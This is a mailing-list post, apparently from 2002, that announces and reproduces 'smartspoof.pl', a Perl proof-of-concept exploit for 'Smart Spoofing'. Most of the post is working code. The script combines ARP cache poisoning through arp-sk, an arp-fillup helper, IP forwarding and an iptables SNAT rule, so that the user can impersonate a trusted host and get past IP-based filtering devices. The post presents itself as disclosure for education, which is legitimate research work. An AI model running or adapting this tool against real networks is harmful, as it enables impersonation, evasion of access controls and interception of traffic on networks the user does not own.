Hello As we reported in our previous article: IP Smartspoofing (http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a new method for IP Spoofing, allowing full-connexion from any client software. The exploit code smartspoof.pl is a proof of concept (for educational purpose only) of the Smart Spoofing method The additional software "arp-fillup" is necessary to achieve this: http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz These tools are also available on http://www.althes.fr/ressources/avis/smartspoofing.htm#tools Exploit Code (perl source) : #!/usr/bin/perl -w # # smartspoof.pl # # This script is provided as proof of concept for educational purpose only # # Laurent Licour 28/10/02 # llicour@althes.fr # Althes (http://www.althes.fr) # # Start/Stop smartspoofing # http://www.althes.fr/ressources/avis/smartspoofing.htm # # Require linux 2.4 (tested on Redhat 7.3) # Require NetAddr::IP perl package (www.cpan.org) # Require arp-sk tool (www.arp-sk.org) # Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm) # Require iptables (www.iptables.org) use strict; use Getopt::Long; use NetAddr::IP; sub get_ip_next_hop { my ($ip0, $int) =3D @_; my $ip=3Dnew NetAddr::IP $ip0; =20 open(ROUTE, "route -n |"); <ROUTE>; <ROUTE>; my $gateway=3D""; my $masklen; my @fields; my $line; my $entry; while($line =3D <ROUTE>) { @fields =3D split / +/, $line; $entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]); if ($entry->contains($ip)) { if (($gateway eq "") or ($masklen < $entry->masklen())) { $gateway =3D $fields[1]; $masklen =3D $entry->masklen(); $$int =3D $fields[7]; chop $$int; } } } die "Error : No route for $ip \n" if ($gateway eq ""); $gateway=3D$ip->addr() if ($gateway eq "0.0.0.0"); return($gateway); } sub get_mac { my $ip=3Dshift; my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1"; system($cmd); $cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'"; my $mac=3D`$cmd`; chop($mac); return($mac); } sub usage { print "Start/Stop de smartspoofing\n\n"; print "This is the proof of concept of the smartspoofing technique\n"; print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n"; print "\n"; print "You only have to specify :\n"; print " -D : address of the filtering equipement to connect to\n"; print " -S : address of the trusted host to spoof\n"; print "\n"; print "Then, you only need to launch your favorite client software from this host\n"; print "or any host behind this (because it is now a router)\n"; print "\n"; print "This script is provided as proof of concept for educational purpose only.\n"; print "\n"; exit 0; } my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@= IP source> -start|-stop\n"; my $ver =3D "smartspoof.pl v1.0 28/10/02\n"; my ($ipsrc, $ipdst); my ($start, $stop); my $interface =3D ""; my ($version, $help); Getopt::Long::GetOptions( "D=3Ds" =3D> \$ipdst, "S=3Ds" =3D> \$ipsrc, "i=3Ds" =3D> \$interface, "v" =3D> \$version, "h" =3D> \$help, "start" =3D> \$start, "stop" =3D> \$stop ) or die $syntax; usage if $help; die $ver if $version; die $syntax unless @ARGV =3D=3D 0; die $syntax unless defined($ipsrc) and defined($ipdst); die $syntax unless defined($start) or defined($stop); die $syntax if $start and $stop; my $cmd; my ($intsrc, $intdst); my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc); my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst); $interface=3D$intdst if ($interface eq ""); if ($start) { print "Activate IP Forwarding\n"; system("echo 1 > /proc/sys/net/ipv4/ip_forward"); print "Activate Arp fillup on $ipsrc\n"; system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &"); print "Set NAT rule on iptables\n"; $cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT --= to $ipsrc"; system($cmd); print "Desactivate ICMP Redirect\n"; system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP"); print "Activate Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop on $interface\n"; $cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop -c 1 >/dev/null 2>&1"; system($cmd); $cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D $ipdst_next_hop >/dev/null 2>&1 &"; system($cmd); } elsif ($stop) { print "Suppress Arp fillup on $ipsrc\n"; system("killall arp-fillup"); print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on $ipdst_next_hop\n"; system("killall arp-sk"); my $mac=3Dget_mac($ipsrc_next_hop); $cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1"; system($cmd); print "Clear iptables rules\n"; system("service iptables stop"); system("service iptables start"); print "Desactivate ip forwarding\n"; system("echo 0 > /proc/sys/net/ipv4/ip_forward"); } Regards Laurent Licour mailto:llicour@althes.fr Althes http://www.althes.fr =20 *---------------------------------------------------------------* * Cet e-mail et toutes les pi=E8ces jointes sont destin=E9s aux * * seules personnes auxquelles ils sont sp=E9cifiquement adress=E9s * * et n'engagent que le signataire de ces documents et non la * * structure dont il d=E9pend. * * Leur existence et leur contenu ont un caract=E8re confidentiel. * * Toute utilisation ou diffusion non autoris=E9e est interdite. * * Si vous avez re=E7u cet e-mail ou si vous d=E9tenez sans en =EAtre * * le destinataire, nous vous demandons de bien vouloir nous en * * informer imm=E9diatement. * * Cette note assure que ce message a =E9t=E9 contr=F4l=E9 et ne * * comprenait aucun virus connu =E0 ce jour, n=E9anmoins tout * * message =E9lectronique est susceptible d'alt=E9ration. * * Nous d=E9clinons toute responsabilit=E9 au titre de ce message * * s'il a =E9t=E9 alt=E9r=E9, d=E9form=E9 ou falsifi=E9. = * *---------------------------------------------------------------* =20
